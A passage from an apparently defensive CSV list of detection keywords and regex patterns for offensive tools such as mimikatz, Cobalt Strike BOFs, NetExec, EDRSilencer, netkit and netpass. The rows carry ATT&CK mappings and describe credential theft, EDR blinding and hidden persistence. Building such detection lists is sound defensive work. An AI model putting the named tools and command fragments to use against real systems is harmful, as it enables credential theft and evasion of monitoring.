keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::if*",".{0,1000}net\:\:if.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::serverinfo*",".{0,1000}net\:\:serverinfo.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::session*",".{0,1000}net\:\:session.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::share*",".{0,1000}net\:\:share.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::stats*",".{0,1000}net\:\:stats.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::tod*",".{0,1000}net\:\:tod.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::trust*",".{0,1000}net\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::user*",".{0,1000}net\:\:user.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::wsession*",".{0,1000}net\:\:wsession.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net_dclist *",".{0,1000}net_dclist\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*net_localgroup_member -Group*",".{0,1000}net_localgroup_member\s\-Group.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 
- T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*net_portscan */24*",".{0,1000}net_portscan\s.{0,1000}\/24.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*net_portscan.py*",".{0,1000}net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*net_recon.*",".{0,1000}net_recon\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*netbiosX/AMSI-Provider*",".{0,1000}netbiosX\/AMSI\-Provider.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","1","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" 
"*netero1010/EDRSilencer*",".{0,1000}netero1010\/EDRSilencer.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*netero1010/GhostTask*",".{0,1000}netero1010\/GhostTask.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*netero1010/Quser-BOF*",".{0,1000}netero1010\/Quser\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 
- T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*netero1010/ScheduleRunner*",".{0,1000}netero1010\/ScheduleRunner.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*netero1010/ServiceMove-BOF*",".{0,1000}netero1010\/ServiceMove\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*NetExec ldap * --*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*NetExec ldap * --dc-ip*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-\-dc\-ip.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*NetExec ldap * -M enum_trusts*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-M\senum_trusts.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*netexec smb *",".{0,1000}netexec\ssmb\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - 
TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*NetExec winrm *--*",".{0,1000}NetExec\swinrm\s.{0,1000}\-\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*NetExec-main.zip*",".{0,1000}NetExec\-main\.zip.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Net-GPPPassword.cs*",".{0,1000}Net\-GPPPassword\.cs.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. 
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*Net-GPPPassword.exe*",".{0,1000}Net\-GPPPassword\.exe.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*Net-GPPPassword_dotNET*",".{0,1000}Net\-GPPPassword_dotNET.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*Net-GPPPassword-master*",".{0,1000}Net\-GPPPassword\-master.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*nethunter-*.torrent*",".{0,1000}nethunter\-.{0,1000}\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*nethunter-*.zip*",".{0,1000}nethunter\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*nethunter-*-oos-ten-kalifs-full.zip*",".{0,1000}nethunter\-.{0,1000}\-oos\-ten\-kalifs\-full\.zip.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*NETKIT_LOG(""*",".{0,1000}NETKIT_LOG\(\"".{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*NETKIT_XOR\x00*",".{0,1000}NETKIT_XOR\\x00.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*netlm_downgrade.*",".{0,1000}netlm_downgrade\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*NETLMv2_fmt_plug.*",".{0,1000}NETLMv2_fmt_plug\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*NetLoader.exe --path *.exe *",".{0,1000}NetLoader\.exe\s\-\-path\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*NetLoader-master*",".{0,1000}NetLoader\-master.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*netloggedonusers.*",".{0,1000}netloggedonusers\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs.
a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*netlogon_##*",".{0,1000}netlogon_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*netntlm.pl 
*",".{0,1000}netntlm\.pl\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*NetNTLMtoSilverTicket.git*",".{0,1000}NetNTLMtoSilverTicket\.git.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*NetNTLMtoSilverTicket-master*",".{0,1000}NetNTLMtoSilverTicket\-master.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*netpass.exe*",".{0,1000}netpass\.exe.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. 
as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*netpass.zip*",".{0,1000}netpass\.zip.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*netpass_x64.exe*",".{0,1000}netpass_x64\.exe.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the 